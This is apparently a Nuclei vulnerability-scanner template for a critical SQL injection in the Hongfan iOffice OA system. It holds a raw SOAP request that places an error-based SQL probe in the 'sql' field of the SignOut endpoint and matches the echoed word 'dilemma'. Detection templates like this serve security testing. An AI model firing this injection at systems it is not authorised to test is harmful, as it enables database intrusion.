id: ioffice-oa-sqli

info:
  name: 红帆 ioffice OA 系统sql注入漏洞
  author: Str1am
  severity: critical
  tags: oa,sqli

requests:
  - raw:
      - |
        POST /ioffice/prg/set/wss/ioCtlSet.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        SOAPAction: http://tempuri.org/SignOut
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <SignOut xmlns="http://tempuri.org/">
                <sql>select convert(int,CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns</sql>
              </SignOut>
            </soap:Body>
          </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "dilemma"
        part: body
        condition: and